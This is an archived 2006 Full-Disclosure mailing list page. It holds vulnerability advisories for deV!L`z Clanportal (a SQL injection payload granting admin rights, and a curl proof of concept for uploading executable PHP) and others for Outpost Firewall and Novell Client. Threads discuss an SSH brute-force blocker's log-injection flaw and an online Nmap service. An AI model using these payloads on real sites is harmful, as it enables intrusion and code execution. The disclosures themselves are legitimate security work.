C E P T / =================================' Check if magic_quotes_gpc is enabled: http:///sites/index.php?show=' If a MySQL error appears or the script dies, it is disabled. Then: http:///sites/index.php?show=-1'+%55NION+%53ELECT+1,+'Admin+Panel\',+level%3d4,+waffe%3d\'SQL+Injection',+2,+3,+' T I M E L I N E (CET) / ========================' 2006-11-23 23:05 started searching 24 0:35 exploited 14:20 advisory finished 17:31 informed vendor that any user can get admin privileges 25 23:00 full disclosure to vendor 27 14:36 hotfix available on vendor website 12-01 10:00 full disclosure to the general public A B O U T T H E A U T H O R / =================================' Tim Weber, computer science student at the University of Mannheim, Germany, currently looking for an internship at some IT security or pentesting company, can be reached via e-mail: scy-adv-061124a at the host scytale.de. T H A N K S / =============' o Kallista o yorn for showing me DZCP and the basics of SQL injections o the DZCP authors for the fun in secure.php From scy-adv at scytale.de Fri Dec 1 09:45:03 2006 From: scy-adv at scytale.de (Tim Weber) Date: Fri, 1 Dec 2006 10:45:03 +0100 Subject: [Full-disclosure] deV!L`z Clanportal - Arbitrary File Upload [061124b] Message-ID: <200612011045.03740.scy-adv@scytale.de> / -[061124b]- \ | deV!L`z Clanportal - Arbitrary File Upload | \ / S Y N O P S I S / =================' -( access: remote severity: high )- deV!L`z Clanportal allows nearly arbitrary files to be uploaded and stored on the server's filesystem, which enables anyone, even without a user account, to upload PHP code and execute it, leading to arbitrary code execution. B A C K G R O U N D / =====================' deV!L`z Clanportal (short "DZCP") is a suite of PHP scripts that allow anybody to create a feature-rich website for her online gaming clan. A F F E C T E D V E R S I O N S / ===================================' verified on: 1.3.6 possibly vulnerable: <= 1.3.6 fixed in: 1.3.6.1 I M P A C T / =============' The attacker can run own code on the web sever with the same privileges as DZCP itself, enabling her to do almost anything from getting the MySQL password to hosting own files and scripts or getting a shell on the server. P R E R E Q U I S I T I E S / =============================' o the attacker needs a file that is both a valid JPEG or GIF file and valid PHP (or probably other) code D E S C R I P T I O N / =======================' upload/index.php is not checking the file extension of uploaded files. Instead it is simply checking the MIME type (that can be spoofed) and the format of an uploaded image. A skilled attacker could upload an image file that has been specially crafted to contain PHP code and yet be recognized as a valid image. The file will be stored on the server, using a file name supplied by the attacker (ending in .php, for example), and can then be executed via HTTP. W O R K A R O U N D / =====================' Some possibilities: o Add something like this before the "switch" statement in upload/index.php: if (isset($_FILES['file']['name']) && !preg_match('/\.(jpg|gif)$/i', $_FILES['file']['name'])) die(); o Remove upload/index.php or make it inaccessible. o Quit using DZCP. I mean it! There are tons of other vulnerabilites just waiting to be exploited; some of them might be as severe as this one. IMHO, DZCP is just a chaotic bunch of vulnerabilities that, by some coincidence, happen to look like a clan portal. P R O O F O F C O N C E P T / =================================' Get a JPEG file, open it in a hex editor, add some PHP inside the EXIF data or in similar places. Make sure PHP's getimagesize() does not return false and that the file does not throw parse errors or the like when fed to PHP. Then: curl -F 'file=@img.php;type=image/jpeg' 'http:///upload/index.php?action=userpic&do=upload' Then check http:///inc/images/uploads/userpics/.php T I M E L I N E (CET) / ========================' 2006-11-24 2:00 started searching 4:00 exploited 15:05 advisory finished 17:31 informed vendor that anybody can run arbitrary code 25 23:00 full disclosure to vendor 27 14:36 hotfix available on vendor website 12-01 10:45 full disclosure to the general public A B O U T T H E A U T H O R / =================================' Tim Weber, computer science student at the University of Mannheim, Germany, currently looking for an internship at some IT security or pentesting company, can be reached via e-mail: scy-adv-061124b at the host scytale.de. T H A N K S / =============' o Kallista o the cat in the fridge o KHexEditor o the DZCP authors for the fun in secure.php From david at matousec.com Fri Dec 1 10:12:30 2006 From: david at matousec.com (David Matousek) Date: Fri, 01 Dec 2006 11:12:30 +0100 Subject: [Full-disclosure] Outpost Bypassing Self-Protection via Advanced DLL injection with handle stealing Vulnerability Message-ID: <4570000E.8040903@matousec.com> Hello, We would like to inform you about a vulnerability in Outpost Firewall PRO 4.0. Description: The system process services.exe cares about system services. It runs them during the system boot and thus owns full access handles to all system services. Outpost protects all processes against common DLL injection and forbids other processes to manipulate its own service process. However, it does not protect services.exe against Advanced DLL injection that does not rely on writing into the target process memory. It is possible to infect services.exe with a malicious DLL and execute an arbitrary code in this system process. It is also possible to find and use its handle of the outpost.exe process to infect Outpost service process similarly. As a result, the attacker is able to inject an arbitrary code into the Outpost's process and thus bypass any of its security mechanisms. Vulnerable software: * Outpost Firewall PRO 4.0 (971.584.079) * Outpost Firewall PRO 4.0 (964.582.059) * probably all older versions of Outpost Firewall PRO 4.0 * possibly older versions of Outpost Firewall PRO More details and a proof of concept including its source code are available here: http://www.matousec.com/info/advisories/Outpost-Bypassing-Self-Protection-via-Advanced-DLL-injection-with-handle-stealing.php Regards, -- Matousec - Transparent security Research http://www.matousec.com/ From dudevanwinkle at gmail.com Fri Dec 1 11:48:38 2006 From: dudevanwinkle at gmail.com (Dude VanWinkle) Date: Fri, 1 Dec 2006 06:48:38 -0500 Subject: [Full-disclosure] Nmap Online In-Reply-To: References: <456BF10D.9080400@matousec.com> <829b2de40611301619r39d24560w16184c16280ab3b1@mail.gmail.com> Message-ID: On 12/1/06, Mike Huber wrote: > first of all, IANAL, but the TOS seem to cover the basics... > None-the-less, my 8-ball sees litigation in their future. portscanning isnt illegal in the states -JP From tonnerre.lombard at sygroup.ch Fri Dec 1 12:17:26 2006 From: tonnerre.lombard at sygroup.ch (Tonnerre Lombard) Date: Fri, 01 Dec 2006 13:17:26 +0100 Subject: [Full-disclosure] SSH brute force blocking tool In-Reply-To: <45701925.7060503@infiltrated.net> References: <456B3AE2.9070708@infiltrated.net> <20061127203433.GC6620@sdf.lonestar.org> <1638869788.20061128152124@Zoller.lu> <456C489F.4020105@infiltrated.net> <20061128154219.GA31705@sdf.lonestar.org> <456C5C31.4000002@infiltrated.net> <20061128160236.GB31705@sdf.lonestar.org> <20061128161621.GC31705@sdf.lonestar.org> <456C6AFF.3060004@infiltrated.net> <1164959233.39297.35.camel@aspirateur.sygroup-int.ch> <45701925.7060503@infiltrated.net> Message-ID: <1164975446.39297.41.camel@aspirateur.sygroup-int.ch> Salut, On Fri, 2006-12-01 at 06:59 -0500, J. Oquendo wrote: > >> Nov 27 16:31:21 local sshd[67010]: Illegal user dd from 213.134.128.227 > >> awk '($5=="Illegal"||$6=="Illegal")&&$9=="from"{print $10}' > > > > What if I set my user name to "bikermice from mars"? Are you going to > > blacklist mars then? > > Apparently you are as stupid as your question is. The syntax won't allow > to pass off anything. Try it before responding idiotically Did you even try it? And what exactly in this awk statement would prevent me from inserting mars in this case? The log statement would look like this: Nov 27 16:31:21 local sshd[67010]: Illegal user bikermice from mars from 213.134.128.227 In this case, your awk statement checks that argument $6 is "Illegal" (which it is) and argument $9 is "from" (which it is). So it takes $10 and prints it (in this case, mars.) If you check $10 to look like an IP address, I set my username to "bikermice from 217.14.64.1", you're going to blacklist 217.14.64.1 because it is a valid IP. Tonnerre -- SyGroup GmbH Tonnerre Lombard Solutions Systematiques Tel:+41 61 333 80 33 Roeschenzerstrasse 9 Fax:+41 61 383 14 67 4153 Reinach BL Web:www.sygroup.ch tonnerre.lombard at sygroup.ch -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: application/pgp-signature Size: 825 bytes Desc: This is a digitally signed message part Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20061201/56baf100/attachment.bin From sil at infiltrated.net Fri Dec 1 12:26:01 2006 From: sil at infiltrated.net (J. Oquendo) Date: Fri, 01 Dec 2006 07:26:01 -0500 Subject: [Full-disclosure] SSH brute force blocking tool In-Reply-To: <1164975446.39297.41.camel@aspirateur.sygroup-int.ch> References: <456B3AE2.9070708@infiltrated.net> <20061127203433.GC6620@sdf.lonestar.org> <1638869788.20061128152124@Zoller.lu> <456C489F.4020105@infiltrated.net> <20061128154219.GA31705@sdf.lonestar.org> <456C5C31.4000002@infiltrated.net> <20061128160236.GB31705@sdf.lonestar.org> <20061128161621.GC31705@sdf.lonestar.org> <456C6AFF.3060004@infiltrated.net> <1164959233.39297.35.camel@aspirateur.sygroup-int.ch> <45701925.7060503@infiltrated.net> <1164975446.39297.41.camel@aspirateur.sygroup-int.ch> Message-ID: <45701F59.4050502@infiltrated.net> Tonnerre Lombard wrote: > In this case, your awk statement checks that argument $6 is > "Illegal" (which it is) and argument $9 is "from" (which it is). So it > takes $10 and prints it (in this case, mars.) > > If you check $10 to look like an IP address, I set my username to > "bikermice from 217.14.64.1", you're going to blacklist 217.14.64.1 > because it is a valid IP. > > Tonnerre > So again... Some of you guys need to go back and read before you post.... awk 'NF<=10&&($6=="nvalid"||$7=="user")&&$9=="from"{print $10}' Once you try a moronic name insertion it makes the columns more than 10 rows invalidating it. Is this a difficult concept to understand? Set your host to whatever you would like, its been discussed and resolved. Is there anything else? Perhaps I should re-write TCP into the script to ensure no one ever spoofs again. -- ==================================================== J. Oquendo http://pgp.mit.edu:11371/pks/lookup?op=get&search=0x1383A743 sil . infiltrated @ net http://www.infiltrated.net The happiness of society is the end of government. John Adams -------------- next part -------------- A non-text attachment was scrubbed... Name: smime.p7s Type: application/x-pkcs7-signature Size: 5157 bytes Desc: S/MIME Cryptographic Signature Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20061201/9c87af00/attachment.bin From tonnerre.lombard at sygroup.ch Fri Dec 1 12:44:22 2006 From: tonnerre.lombard at sygroup.ch (Tonnerre Lombard) Date: Fri, 01 Dec 2006 13:44:22 +0100 Subject: [Full-disclosure] SSH brute force blocking tool In-Reply-To: <45701F59.4050502@infiltrated.net> References: <456B3AE2.9070708@infiltrated.net> <20061127203433.GC6620@sdf.lonestar.org> <1638869788.20061128152124@Zoller.lu> <456C489F.4020105@infiltrated.net> <20061128154219.GA31705@sdf.lonestar.org> <456C5C31.4000002@infiltrated.net> <20061128160236.GB31705@sdf.lonestar.org> <20061128161621.GC31705@sdf.lonestar.org> <456C6AFF.3060004@infiltrated.net> <1164959233.39297.35.camel@aspirateur.sygroup-int.ch> <45701925.7060503@infiltrated.net> <1164975446.39297.41.camel@aspirateur.sygroup-int.ch> <45701F59.4050502@infiltrated.net> Message-ID: <1164977062.39297.49.camel@aspirateur.sygroup-int.ch> Salut, On Fri, 2006-12-01 at 07:26 -0500, J. Oquendo wrote: > So again... Some of you guys need to go back and read before you post.... In this case, the NF wasn't in your original posting, so I could hardly have seen it. Still, there are problems with it, but not security wise... > awk 'NF<=10&&($6=="nvalid"||$7=="user")&&$9=="from"{print $10}' > > Once you try a moronic name insertion it makes the columns more than 10 > rows invalidating it. In that case, your script isn't going to work in most cases. For example, on our router we get: Dec 1 13:35:24 rtsyg01 sshd[12178]: Failed password for invalid user asdf from 10.1.5.166 port 51558 ssh2 -> more than 10 columns. Also, one of our customers uses user names which consist of two parts which are separated by spaces. This is due to his use of Windows. The users are called e.g. "John Doe", so you do an ssh "John Doe at servername.asdf.ch". In this case, your script fails entirely. Probably a top-down parser isn't really suitable for this. If at all, you should make an attempt to parse from the end of the string. sed can help you there. > Perhaps I should re-write TCP into the script to ensure no one ever > spoofs again. That wouldn't be very useful since the L4Addr doesn't matter much here, as we're dealing with L3addrs... Tonnerre -- SyGroup GmbH Tonnerre Lombard Solutions Systematiques Tel:+41 61 333 80 33 Roeschenzerstrasse 9 Fax:+41 61 383 14 67 4153 Reinach BL Web:www.sygroup.ch tonnerre.lombard at sygroup.ch -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: application/pgp-signature Size: 825 bytes Desc: This is a digitally signed message part Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20061201/abb811a3/attachment.bin From sil at infiltrated.net Fri Dec 1 12:50:14 2006 From: sil at infiltrated.net (J. Oquendo) Date: Fri, 01 Dec 2006 07:50:14 -0500 Subject: [Full-disclosure] SSH brute force blocking tool In-Reply-To: <1164977062.39297.49.camel@aspirateur.sygroup-int.ch> References: <456B3AE2.9070708@infiltrated.net> <20061127203433.GC6620@sdf.lonestar.org> <1638869788.20061128152124@Zoller.lu> <456C489F.4020105@infiltrated.net> <20061128154219.GA31705@sdf.lonestar.org> <456C5C31.4000002@infiltrated.net> <20061128160236.GB31705@sdf.lonestar.org> <20061128161621.GC31705@sdf.lonestar.org> <456C6AFF.3060004@infiltrated.net> <1164959233.39297.35.camel@aspirateur.sygroup-int.ch> <45701925.7060503@infiltrated.net> <1164975446.39297.41.camel@aspirateur.sygroup-int.ch> <45701F59.4050502@infiltrated.net> <1164977062.39297.49.camel@aspirateur.sygroup-int.ch> Message-ID: <45702506.4070300@infiltrated.net> Tonnerre Lombard wrote: > Salut, > > On Fri, 2006-12-01 at 07:26 -0500, J. Oquendo wrote: > >> So again... Some of you guys need to go back and read before you post.... >> > > In this case, the NF wasn't in your original posting, so I could hardly > have seen it. Still, there are problems with it, but not security > wise... > > >> awk 'NF<=10&&($6=="nvalid"||$7=="user")&&$9=="from"{print $10}' >> >> Once you try a moronic name insertion it makes the columns more than 10 >> rows invalidating it. >> > > In that case, your script isn't going to work in most cases. For > example, on our router we get: > > Dec 1 13:35:24 rtsyg01 sshd[12178]: Failed password for invalid user > asdf from 10.1.5.166 port 51558 ssh2 > > -> more than 10 columns. > > And this is my problem how? The script was written mainly for myself and was passed on as something someone can use at their leisure and expense. "Your script isn't going to work boohoo" Is it not customizable to fit your need. I would think so all it is doing is text processing no brainer there. > Also, one of our customers uses user names which consist of two parts > which are separated by spaces. This is due to his use of Windows. The > users are called e.g. "John Doe", so you do an ssh "John > Doe at servername.asdf.ch". In this case, your script fails entirely > Again... Re-read my previous paragraph. -- ==================================================== J. Oquendo http://pgp.mit.edu:11371/pks/lookup?op=get&search=0x1383A743 sil . infiltrated @ net http://www.infiltrated.net The happiness of society is the end of government. John Adams -------------- next part -------------- A non-text attachment was scrubbed... Name: smime.p7s Type: application/x-pkcs7-signature Size: 5157 bytes Desc: S/MIME Cryptographic Signature Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20061201/5b111b85/attachment.bin From jammer128 at gmail.com Fri Dec 1 12:56:43 2006 From: jammer128 at gmail.com (Jason Miller) Date: Fri, 1 Dec 2006 06:56:43 -0600 Subject: [Full-disclosure] Nmap Online In-Reply-To: References: <456BF10D.9080400@matousec.com> <829b2de40611301619r39d24560w16184c16280ab3b1@mail.gmail.com> Message-ID: <829b2de40612010456n1049c644ie06d1ff292abba7d@mail.gmail.com> I agree with Dave on this one. Dude Van, I thought it was illegal in the states..? Or am I mistaken? Also, think of this from the ISP's view, do they really want a service port scanning their users? And look at it this way, said target has a proxy server on it, attacker proxies into the proxy and scans the target server with that service, since he is now on the targets IP address, I think you understand what I'm getting at by now. nmap is made to find exploits, that is what this service is going to wind up being abused for (in most cases that i know). On 12/1/06, Dave Moore wrote: > > On 12/1/06, Mike Huber wrote: > > first of all, IANAL, but the TOS seem to cover the basics... However, I > am > > unsure whether they would hold up under strict legal scrutiny. As far > as I > > can tell, they may hold up under US criminal law, but not under civil > law, > > as tort law has its own wonderful little eccentricities. The best > safeguard > > they seem to have is that they must log the source IP of all scan > > requests... As far as I know, anyone who takes the time to read the > nmap > > man page should be able to craft a scan which won't be detected by the > > scanned host (can someone be a definitive source on this point?), and > anyone > > taking malicious action ought to be taking sufficient precautions to > avoid > > detection anyway. None-the-less, my 8-ball sees litigation in their > future. > > All nmap scans are detectable. All port scans are detectable. Just > depends on how hard you're looking. > -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20061201/34197a40/attachment.html From ltr at isc.upenn.edu Fri Dec 1 13:50:48 2006 From: ltr at isc.upenn.edu (David Taylor) Date: Fri, 1 Dec 2006 08:50:48 -0500 Subject: [Full-disclosure] Nmap Online In-Reply-To: <456BF10D.9080400@matousec.com> Message-ID: <01af01c7154f$b518a780$654b5b82@shakuhachi> How do you plan on dealing with all the abuse complaints you get hit with when people use your server to perform unauthorized scans of their networks? ================================================== David Taylor //Sr. Information Security Specialist University of Pennsylvania Information Security Philadelphia PA USA (215) 898-1236 http://www.upenn.edu/computing/security/ ================================================== Shadowserver Foundation Member http://www.shadowserver.org/ -----Original Message----- From: full-disclosure-bounces at lists.grok.org.uk [mailto:full-disclosure-bounces at lists.grok.org.uk] On Behalf Of David Matousek Sent: Tuesday, November 28, 2006 3:19 AM To: full-disclosure at lists.grok.org.uk Subject: [Full-disclosure] Nmap Online Hello, For all Nmap fans, our group have implemented Nmap Online service. Its address is http://nmap-online.com/. The interface allows you to perform custom Nmap scans from our server with only a few limitations in the syntax. The service is free and can be used immediately, no registration is required. Please direct your questions and suggestions to our emails. Regards, -- David Matousek Founder and Chief Representative of Matousec - Transparent security http://www.matousec.com/ _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ From falco at gentoo.org Fri Dec 1 14:02:26 2006 From: falco at gentoo.org (Raphael Marichez) Date: Fri, 1 Dec 2006 15:02:26 +0100 Subject: [Full-disclosure] SSH brute force blocking tool In-Reply-To: <45701F59.4050502@infiltrated.net> References: <456C489F.4020105@infiltrated.net> <20061128154219.GA31705@sdf.lonestar.org> <456C5C31.4000002@infiltrated.net> <20061128160236.GB31705@sdf.lonestar.org> <20061128161621.GC31705@sdf.lonestar.org> <456C6AFF.3060004@infiltrated.net> <1164959233.39297.35.camel@aspirateur.sygroup-int.ch> <45701925.7060503@infiltrated.net> <1164975446.39297.41.camel@aspirateur.sygroup-int.ch> <45701F59.4050502@infiltrated.net> Message-ID: <20061201140226.GC26621@falco.falcal.net> On Fri, 01 Dec 2006, J. Oquendo wrote: > Tonnerre Lombard wrote: > > > >In this case, your awk statement checks that argument $6 is > >"Illegal" (which it is) and argument $9 is "from" (which it is). So it > >takes $10 and prints it (in this case, mars.) > > > >If you check $10 to look like an IP address, I set my username to > >"bikermice from 217.14.64.1", you're going to blacklist 217.14.64.1 > >because it is a valid IP. > > > > Tonnerre > > > > So again... Some of you guys need to go back and read before you post.... ok, you're right, let's go back and let's read again: You mention (from the attached mail, you've written): Nov 27 16:31:21 local sshd[67010]: Illegal user dd from 213.134.128.227 awk '($5=="Illegal"||$6=="Illegal")&&$9=="from"{print $10}' Note that there is no "NF" in this line. > > awk 'NF<=10&&($6=="nvalid"||$7=="user")&&$9=="from"{print $10}' > you're fixing your script when someone shows a security hole, that's a good practice. But don't insult the men who mention the vulnerabilities... They are actually helping you, because you're improving your script thanks to them. > > Once you try a moronic name insertion it makes the columns more than 10 rows invalidating it. > Is this a difficult concept to understand? Set your host to whatever you would like, its been > discussed and resolved. Is there anything else? Perhaps I should re-write TCP into the script > to ensure no one ever spoofs again. > -- Rapha?l Marichez aka Falco -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: application/pgp-signature Size: 189 bytes Desc: not available Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20061201/94a90342/attachment.bin From falco at gentoo.org Fri Dec 1 14:04:59 2006 From: falco at gentoo.org (Raphael Marichez) Date: Fri, 1 Dec 2006 15:04:59 +0100 Subject: [Full-disclosure] SSH brute force blocking tool In-Reply-To: <20061201140226.GC26621@falco.falcal.net> References: <20061128154219.GA31705@sdf.lonestar.org> <456C5C31.4000002@infiltrated.net> <20061128160236.GB31705@sdf.lonestar.org> <20061128161621.GC31705@sdf.lonestar.org> <456C6AFF.3060004@infiltrated.net> <1164959233.39297.35.camel@aspirateur.sygroup-int.ch> <45701925.7060503@infiltrated.net> <1164975446.39297.41.camel@aspirateur.sygroup-int.ch> <45701F59.4050502@infiltrated.net> <20061201140226.GC26621@falco.falcal.net> Message-ID: <20061201140459.GD26621@falco.falcal.net> On Fri, 01 Dec 2006, Raphael Marichez wrote: > You mention (from the attached mail, you've written): sorry, here's your email -- Rapha?l Marichez aka Falco -------------- next part -------------- An embedded message was scrubbed... From: "J. Oquendo" Subject: Re: [Full-disclosure] SSH brute force blocking tool Date: Tue, 28 Nov 2006 11:59:43 -0500 Size: 15396 Url: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20061201/fa59657f/attachment.mht -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: application/pgp-signature Size: 189 bytes Desc: not available Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20061201/fa59657f/attachment.bin From dudevanwinkle at gmail.com Fri Dec 1 14:09:25 2006 From: dudevanwinkle at gmail.com (Dude VanWinkle) Date: Fri, 1 Dec 2006 09:09:25 -0500 Subject: [Full-disclosure] Nmap Online In-Reply-To: <829b2de40612010456n1049c644ie06d1ff292abba7d@mail.gmail.com> References: <456BF10D.9080400@matousec.com> <829b2de40611301619r39d24560w16184c16280ab3b1@mail.gmail.com> <829b2de40612010456n1049c644ie06d1ff292abba7d@mail.gmail.com> Message-ID: On 12/1/06, Jason Miller wrote: > I agree with Dave on this one. Dude Van, I thought it was illegal in the > states..? Or am I mistaken? http://www.securityfocus.com/news/126 > Also, think of this from the ISP's view, do they > really want a service port scanning their users? And look at it this way, > said target has a proxy server on it, attacker proxies into the proxy and > scans the target server with that service, since he is now on the targets IP > address, I think you understand what I'm getting at by now. nmap is made to > find exploits, that is what this service is going to wind up being abused > for (in most cases that i know). nmap is used to find open ports and fingerprint OS's. What you do with that info is up to you. Here is an example of what is legal vs what isnt: If you scan a machine with nmap from one machine, that is not illegal. If you run 100,00 nmap scans from a distributed botnet and take down their server, thats illegal. If your nmap scan tells you that port 80 is open and you run a nessus scan and find that they are vulnerable to a bug in their webserver is that illegal? I do know If you exploit that weakness and backdoor their machine, you just broke the law, but am unsure about nessus's legality on systems you dont have a get out of jail free card for or own. I have no doubt about nmap though. as long as you dont take down their servers with the scans, you are legit. -JP From sil at infiltrated.net Fri Dec 1 14:09:25 2006 From: sil at infiltrated.net (J. Oquendo) Date: Fri, 01 Dec 2006 09:09:25 -0500 Subject: [Full-disclosure] SSH brute force blocking tool In-Reply-To: <20061201140226.GC26621@falco.falcal.net> References: <456C489F.4020105@infiltrated.net> <20061128154219.GA31705@sdf.lonestar.org> <456C5C31.4000002@infiltrated.net> <20061128160236.GB31705@sdf.lonestar.org> <20061128161621.GC31705@sdf.lonestar.org> <456C6AFF.3060004@infiltrated.net> <1164959233.39297.35.camel@aspirateur.sygroup-int.ch> <45701925.7060503@infiltrated.net> <1164975446.39297.41.camel@aspirateur.sygroup-int.ch> <45701F59.4050502@infiltrated.net> <20061201140226.GC26621@falco.falcal.net> Message-ID: <45703795.4070002@infiltrated.net> Raphael Marichez wrote: > you're fixing your script when someone shows a security hole, that's a > good practice. But don't insult the men who mention the > vulnerabilities... They are actually helping you, because you're improving > your script thanks to them. > Hello... Some of you guys seriously need to do some reading and refreshing of your browsers... The script was fixed days ago. http://lists.grok.org.uk/pipermail/full-disclosure/2006-November/050952.html // SNIPPED Nov 27 16:31:21 local sshd[67010]: Illegal user dd from 213.134.128.227 awk '($5=="Illegal"||$6=="Illegal")&&$9=="from"{print $10}' Would stop the insertion attack and only print out the tench field if fields 5, 6 and 9 match Illegal user from. So that would pretty much minimize the attack on name insertion. If I wanted to I could also make sure that if someone came after field 10, then ignore the entire line: Nov 27 16:31:21 local sshd[67010]: Illegal user dd from 213.134.128.227 ... SO let me restate. I could modify it to look at lines 5, 6, and 9 ... Take a look at the tenth column and if anything comes after that...Ignore that entire line... Should I have done so, maybe... Will I do so... Maybe... // END SNIP And I fixed it the same day to avoid the insertion of moronic usernames. Read the entire thread. My critiques comes from people who only snip out what is suitable for them to read. -- ==================================================== J. Oquendo http://pgp.mit.edu:11371/pks/lookup?op=get&search=0x1383A743 sil . infiltrated @ net http://www.infiltrated.net The happiness of society is the end of government. John Adams -------------- next part -------------- A non-text attachment was scrubbed... Name: smime.p7s Type: application/x-pkcs7-signature Size: 5157 bytes Desc: S/MIME Cryptographic Signature Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20061201/a194f5ee/attachment.bin From juha-matti.laurio at netti.fi Fri Dec 1 14:34:06 2006 From: juha-matti.laurio at netti.fi (Juha-Matti Laurio) Date: Fri, 1 Dec 2006 16:34:06 +0200 (EET) Subject: [Full-disclosure] Financial firms warned of Qaeda cyber attack Message-ID: <16640517.344181164983646039.JavaMail.juha-matti.laurio@netti.fi> >From the Reuters article: "WASHINGTON (Reuters) - The U.S. government warned American private financial services on Thursday of an al Qaeda call for a cyber attack against online stock trading and banking Web sites beginning on Friday, a source said." Reportedly DHS confirmed an alert had been distributed but said there was no reason to believe the threat was credible. More at http://today.reuters.com/News/newsArticle.aspx?type=internetNews&storyID=2006-12-01T061519Z_01_WBT006236_RTRUKOC_0_US-SECURITY-USA-QAEDA.xml&WTmodLoc=InternetNewsHome_C1_%5bFeed%5d-8 SANS Internet Storm Center (ISC) has issued the following Diary entries, several references included: >From ISC director Marcus H. Sachs: http://isc.sans.org/diary.php?storyid=1900 and "US DHS banking alert" entry released earlier by Johannes Ullrich: http://isc.sans.org/diary.php?storyid=1899 - Juha-Matti From colweb at gmail.com Fri Dec 1 12:48:54 2006 From: colweb at gmail.com (Col) Date: Fri, 1 Dec 2006 12:48:54 +0000 Subject: [Full-disclosure] Nmap Online In-Reply-To: References: <456BF10D.9080400@matousec.com> <829b2de40611301619r39d24560w16184c16280ab3b1@mail.gmail.com> Message-ID: <1bde4ec50612010448y4c0bc8fbi1b9ad62235c58757@mail.gmail.com> "Service unavailable. Please try again later." That was quick! Col. From dswafford at alterhighschool.org Fri Dec 1 14:40:59 2006 From: dswafford at alterhighschool.org (David Swafford) Date: Fri, 01 Dec 2006 09:40:59 -0500 Subject: [Full-disclosure] Nmap Online In-Reply-To: <1bde4ec50612010448y4c0bc8fbi1b9ad62235c58757@mail.gmail.com> References: <456BF10D.9080400@matousec.com> <829b2de40611301619r39d24560w16184c16280ab3b1@mail.gmail.com> <1bde4ec50612010448y4c0bc8fbi1b9ad62235c58757@mail.gmail.com> Message-ID: <456FF8AA.9B1E.0073.0@alterhighschool.org> Maybe it got hacked? ...I wonder if someone probably didn't like all the portscans they got from it (....thinks of Microsoft) and took it out? David. >>> Col 12/1/2006 7:48 am >>> "Service unavailable. Please try again later." That was quick! Col. _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ______________________________________________________ Founded in Faith - Preserved with Pride - Sustained by Spirit ______________________________________________________ -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20061201/6cb97b56/attachment.html From dh at layereddefense.com Fri Dec 1 10:55:55 2006 From: dh at layereddefense.com (Deral Heiland) Date: Fri, 01 Dec 2006 05:55:55 -0500 Subject: [Full-disclosure] Layered Defense Advisory: Novell Client 4.91 Format String Vulnerability In-Reply-To: <7.0.1.0.0.20061001180650.021ff140@sbcglobal.net> References: <7.0.1.0.0.20061001180650.021ff140@sbcglobal.net> Message-ID: <7.0.1.0.0.20061201055132.027c4de0@layereddefense.com> ================================================== Layered Defense Advisory 1 December 2006 ================================================== 1) Affected Software Novell Client 4.91 SP2 Novell Client 4.91 SP2 Patch Kit Novell Client 4.91 SP3 Earlier versions may also be vulnerable ================================================== 2) SeverityRating: Low - Medium risk Impact: Read arbitrary memory, denial of service. ================================================== 3) Description of Vulnerability A format string vulnerability was discovered within Novell client 4.91 . The vulnerability is due to improper processing of format strings within NMAS (Novell Modular Authentication Services) Information message window. An attacker who enters special crafted format strings in the Username field at the Novell logon and selects Sequences under the NMAS tab can read data from the winlogon process stack or read from arbitrary memory, and at a minimum cause a denial of service. ================================================== 4) Solution Fix: Presently no patch is available. Work around: Disable NMAS Authentication ================================================== 5) Time Table: 07/15/2006 Reported Vulnerability to Vendor. 08/21/2006 Vendor released Novell Client - 4.91 SP2 Patch Kit which made the vulnerability worse. (This patch made it easier to read arbitrary memory) 09/17/2006 Contacted Vendor about increased risk with SP2 Patch Kit 11/28/2006 Received the following message from Vendor : At this point in time, development has determined this is a very low priority and apparently it will be some time before the issue is addressed. I have reported this to our Security Review Board so development's claim can be re-examined. As such, you certainly have every right to publish your findings at this time. The bug will remain open against the product. Hopefully this can be fixed in the near future ================================================== 6) CreditsDiscovered by Deral Heiland, www.LayeredDefense.com ================================================== 7) About Layered DefenseLayered Defense, Is a group of security professionals that work together on ethical Research, Testing and Training within the information security arena. http://www.layereddefense.com ================================================== From david at matousec.com Fri Dec 1 14:02:13 2006 From: david at matousec.com (David Matousek) Date: Fri, 01 Dec 2006 15:02:13 +0100 Subject: [Full-disclosure] Nmap Online In-Reply-To: <01af01c7154f$b518a780$654b5b82@shakuhachi> References: <01af01c7154f$b518a780$654b5b82@shakuhachi> Message-ID: <457035E5.8090405@matousec.com> We have set limits to prevent abusing of our service. Yes, one can still scan someone other's network, this is in violation with out Terms of Service. We log every attempt and we are ready to provide these logs to authorities. However, everyone who has Internet access is able to download Nmap and do similar scan. You can do nothing more with our service. There is no damage you can cause with our service even if it is abused. We believe that pros are more than cons here, that people will use our service to fix their issues on their firewalls and networks. -- David Matousek Founder and Chief Representative of Matousec - Transparent security http://www.matousec.com/ David Taylor wrote: > How do you plan on dealing with all the abuse complaints you get hit with > when people use your server to perform unauthorized scans of their networks? > > > ================================================== > David Taylor //Sr. Information Security Specialist > University of Pennsylvania Information Security > Philadelphia PA USA > (215) 898-1236 > http://www.upenn.edu/computing/security/ > ================================================== > > > Shadowserver Foundation Member > http://www.shadowserver.org/ > > > > -----Original Message----- > From: full-disclosure-bounces at lists.grok.org.uk > [mailto:full-disclosure-bounces at lists.grok.org.uk] On Behalf Of David > Matousek > Sent: Tuesday, November 28, 2006 3:19 AM > To: full-disclosure at lists.grok.org.uk > Subject: [Full-disclosure] Nmap Online > > > Hello, > > For all Nmap fans, our group have implemented Nmap Online service. > Its address is http://nmap-online.com/. The interface allows you to perform > custom > Nmap scans from our server with only a few 